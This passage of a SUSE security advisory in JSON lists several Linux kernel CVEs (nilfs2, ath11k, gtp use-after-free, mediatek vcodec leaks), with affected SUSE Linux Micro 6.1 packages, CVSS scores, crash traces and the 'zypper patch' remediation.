"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54137",
"url": "https://www.suse.com/security/cve/CVE-2023-54137"
},
{
"category": "external",
"summary": "SUSE Bug 1256100 for CVE-2023-54137",
"url": "https://bugzilla.suse.com/1256100"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54137"
},
{
"cve": "CVE-2023-54140",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54140"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnilfs2: fix WARNING in mark_buffer_dirty due to discarded buffer reuse\n\nA syzbot stress test using a corrupted disk image reported that\nmark_buffer_dirty() called from __nilfs_mark_inode_dirty() or\nnilfs_palloc_commit_alloc_entry() may output a kernel warning, and can\npanic if the kernel is booted with panic_on_warn.\n\nThis is because nilfs2 keeps buffer pointers in local structures for some\nmetadata and reuses them, but such buffers may be forcibly discarded by\nnilfs_clear_dirty_page() in some critical situations.\n\nThis issue is reported to appear after commit 28a65b49eb53 (\"nilfs2: do\nnot write dirty data after degenerating to read-only\"), but the issue has\npotentially existed before.\n\nFix this issue by checking the uptodate flag when attempting to reuse an\ninternally held buffer, and reloading the metadata instead of reusing the\nbuffer if the flag was lost.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54140",
"url": "https://www.suse.com/security/cve/CVE-2023-54140"
},
{
"category": "external",
"summary": "SUSE Bug 1256093 for CVE-2023-54140",
"url": "https://bugzilla.suse.com/1256093"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "low"
}
],
"title": "CVE-2023-54140"
},
{
"cve": "CVE-2023-54141",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54141"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath11k: Add missing hw_ops-\u003eget_ring_selector() for IPQ5018\n\nDuring sending data after clients connected, hw_ops-\u003eget_ring_selector()\nwill be called. But for IPQ5018, this member isn\u0027t set, and the\nfollowing NULL pointer exception will be occurred:\n\n\t[ 38.840478] 8\u003c--- cut here ---\n\t[ 38.840517] Unable to handle kernel NULL pointer dereference at virtual address 00000000\n\t...\n\t[ 38.923161] PC is at 0x0\n\t[ 38.927930] LR is at ath11k_dp_tx+0x70/0x730 [ath11k]\n\t...\n\t[ 39.063264] Process hostapd (pid: 1034, stack limit = 0x801ceb3d)\n\t[ 39.068994] Stack: (0x856a9a68 to 0x856aa000)\n\t...\n\t[ 39.438467] [\u003c7f323804\u003e] (ath11k_dp_tx [ath11k]) from [\u003c7f314e6c\u003e] (ath11k_mac_op_tx+0x80/0x190 [ath11k])\n\t[ 39.446607] [\u003c7f314e6c\u003e] (ath11k_mac_op_tx [ath11k]) from [\u003c7f17dbe0\u003e] (ieee80211_handle_wake_tx_queue+0x7c/0xc0 [mac80211])\n\t[ 39.456162] [\u003c7f17dbe0\u003e] (ieee80211_handle_wake_tx_queue [mac80211]) from [\u003c7f174450\u003e] (ieee80211_probereq_get+0x584/0x704 [mac80211])\n\t[ 39.467443] [\u003c7f174450\u003e] (ieee80211_probereq_get [mac80211]) from [\u003c7f178c40\u003e] (ieee80211_tx_prepare_skb+0x1f8/0x248 [mac80211])\n\t[ 39.479334] [\u003c7f178c40\u003e] (ieee80211_tx_prepare_skb [mac80211]) from [\u003c7f179e28\u003e] (__ieee80211_subif_start_xmit+0x32c/0x3d4 [mac80211])\n\t[ 39.491053] [\u003c7f179e28\u003e] (__ieee80211_subif_start_xmit [mac80211]) from [\u003c7f17af08\u003e] (ieee80211_tx_control_port+0x19c/0x288 [mac80211])\n\t[ 39.502946] [\u003c7f17af08\u003e] (ieee80211_tx_control_port [mac80211]) from [\u003c7f0fc704\u003e] (nl80211_tx_control_port+0x174/0x1d4 [cfg80211])\n\t[ 39.515017] [\u003c7f0fc704\u003e] (nl80211_tx_control_port [cfg80211]) from [\u003c808ceac4\u003e] (genl_rcv_msg+0x154/0x340)\n\t[ 39.526814] [\u003c808ceac4\u003e] (genl_rcv_msg) from [\u003c808cdb74\u003e] (netlink_rcv_skb+0xb8/0x11c)\n\t[ 39.536446] [\u003c808cdb74\u003e] (netlink_rcv_skb) from [\u003c808ce1d0\u003e] (genl_rcv+0x28/0x34)\n\t[ 39.544344] [\u003c808ce1d0\u003e] (genl_rcv) from [\u003c808cd234\u003e] (netlink_unicast+0x174/0x274)\n\t[ 39.551895] [\u003c808cd234\u003e] (netlink_unicast) from [\u003c808cd510\u003e] (netlink_sendmsg+0x1dc/0x440)\n\t[ 39.559362] [\u003c808cd510\u003e] (netlink_sendmsg) from [\u003c808596e0\u003e] (____sys_sendmsg+0x1a8/0x1fc)\n\t[ 39.567697] [\u003c808596e0\u003e] (____sys_sendmsg) from [\u003c8085b1a8\u003e] (___sys_sendmsg+0xa4/0xdc)\n\t[ 39.575941] [\u003c8085b1a8\u003e] (___sys_sendmsg) from [\u003c8085b310\u003e] (sys_sendmsg+0x44/0x74)\n\t[ 39.583841] [\u003c8085b310\u003e] (sys_sendmsg) from [\u003c80300060\u003e] (ret_fast_syscall+0x0/0x40)\n\t...\n\t[ 39.620734] Code: bad PC value\n\t[ 39.625869] ---[ end trace 8aef983ad3cbc032 ]---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54141",
"url": "https://www.suse.com/security/cve/CVE-2023-54141"
},
{
"category": "external",
"summary": "SUSE Bug 1256094 for CVE-2023-54141",
"url": "https://bugzilla.suse.com/1256094"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54141"
},
{
"cve": "CVE-2023-54142",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54142"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ngtp: Fix use-after-free in __gtp_encap_destroy().\n\nsyzkaller reported use-after-free in __gtp_encap_destroy(). [0]\n\nIt shows the same process freed sk and touched it illegally.\n\nCommit e198987e7dd7 (\"gtp: fix suspicious RCU usage\") added lock_sock()\nand release_sock() in __gtp_encap_destroy() to protect sk-\u003esk_user_data,\nbut release_sock() is called after sock_put() releases the last refcnt.\n\n[0]:\nBUG: KASAN: slab-use-after-free in instrument_atomic_read_write include/linux/instrumented.h:96 [inline]\nBUG: KASAN: slab-use-after-free in atomic_try_cmpxchg_acquire include/linux/atomic/atomic-instrumented.h:541 [inline]\nBUG: KASAN: slab-use-after-free in queued_spin_lock include/asm-generic/qspinlock.h:111 [inline]\nBUG: KASAN: slab-use-after-free in do_raw_spin_lock include/linux/spinlock.h:186 [inline]\nBUG: KASAN: slab-use-after-free in __raw_spin_lock_bh include/linux/spinlock_api_smp.h:127 [inline]\nBUG: KASAN: slab-use-after-free in _raw_spin_lock_bh+0x75/0xe0 kernel/locking/spinlock.c:178\nWrite of size 4 at addr ffff88800dbef398 by task syz-executor.2/2401\n\nCPU: 1 PID: 2401 Comm: syz-executor.2 Not tainted 6.4.0-rc5-01219-gfa0e21fa4443 #2\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014\nCall Trace:\n \u003cTASK\u003e\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0x72/0xa0 lib/dump_stack.c:106\n print_address_description mm/kasan/report.c:351 [inline]\n print_report+0xcc/0x620 mm/kasan/report.c:462\n kasan_report+0xb2/0xe0 mm/kasan/report.c:572\n check_region_inline mm/kasan/generic.c:181 [inline]\n kasan_check_range+0x39/0x1c0 mm/kasan/generic.c:187\n instrument_atomic_read_write include/linux/instrumented.h:96 [inline]\n atomic_try_cmpxchg_acquire include/linux/atomic/atomic-instrumented.h:541 [inline]\n queued_spin_lock include/asm-generic/qspinlock.h:111 [inline]\n do_raw_spin_lock include/linux/spinlock.h:186 [inline]\n __raw_spin_lock_bh include/linux/spinlock_api_smp.h:127 [inline]\n _raw_spin_lock_bh+0x75/0xe0 kernel/locking/spinlock.c:178\n spin_lock_bh include/linux/spinlock.h:355 [inline]\n release_sock+0x1f/0x1a0 net/core/sock.c:3526\n gtp_encap_disable_sock drivers/net/gtp.c:651 [inline]\n gtp_encap_disable+0xb9/0x220 drivers/net/gtp.c:664\n gtp_dev_uninit+0x19/0x50 drivers/net/gtp.c:728\n unregister_netdevice_many_notify+0x97e/0x1520 net/core/dev.c:10841\n rtnl_delete_link net/core/rtnetlink.c:3216 [inline]\n rtnl_dellink+0x3c0/0xb30 net/core/rtnetlink.c:3268\n rtnetlink_rcv_msg+0x450/0xb10 net/core/rtnetlink.c:6423\n netlink_rcv_skb+0x15d/0x450 net/netlink/af_netlink.c:2548\n netlink_unicast_kernel net/netlink/af_netlink.c:1339 [inline]\n netlink_unicast+0x700/0x930 net/netlink/af_netlink.c:1365\n netlink_sendmsg+0x91c/0xe30 net/netlink/af_netlink.c:1913\n sock_sendmsg_nosec net/socket.c:724 [inline]\n sock_sendmsg+0x1b7/0x200 net/socket.c:747\n ____sys_sendmsg+0x75a/0x990 net/socket.c:2493\n ___sys_sendmsg+0x11d/0x1c0 net/socket.c:2547\n __sys_sendmsg+0xfe/0x1d0 net/socket.c:2576\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x3f/0x90 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x72/0xdc\nRIP: 0033:0x7f1168b1fe5d\nCode: ff c3 66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 01 c3 48 8b 0d 73 9f 1b 00 f7 d8 64 89 01 48\nRSP: 002b:00007f1167edccc8 EFLAGS: 00000246 ORIG_RAX: 000000000000002e\nRAX: ffffffffffffffda RBX: 00000000004bbf80 RCX: 00007f1168b1fe5d\nRDX: 0000000000000000 RSI: 00000000200002c0 RDI: 0000000000000003\nRBP: 00000000004bbf80 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000\nR13: 000000000000000b R14: 00007f1168b80530 R15: 0000000000000000\n \u003c/TASK\u003e\n\nAllocated by task 1483:\n kasan_save_stack+0x22/0x50 mm/kasan/common.c:45\n kasan_set_track+0x25/0x30 mm/kasan/common.c:52\n __kasan_slab_alloc+0x\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54142",
"url": "https://www.suse.com/security/cve/CVE-2023-54142"
},
{
"category": "external",
"summary": "SUSE Bug 1256095 for CVE-2023-54142",
"url": "https://bugzilla.suse.com/1256095"
},
{
"category": "external",
"summary": "SUSE Bug 1256097 for CVE-2023-54142",
"url": "https://bugzilla.suse.com/1256097"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "important"
}
],
"title": "CVE-2023-54142"
},
{
"cve": "CVE-2023-54143",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54143"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: mediatek: vcodec: fix resource leaks in vdec_msg_queue_init()\n\nIf we encounter any error in the vdec_msg_queue_init() then we need\nto set \"msg_queue-\u003ewdma_addr.size = 0;\". Normally, this is done\ninside the vdec_msg_queue_deinit() function. However, if the\nfirst call to allocate \u0026msg_queue-\u003ewdma_addr fails, then the\nvdec_msg_queue_deinit() function is a no-op. For that situation, just\nset the size to zero explicitly and return.\n\nThere were two other error paths which did not clean up before returning.\nChange those error paths to goto mem_alloc_err.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
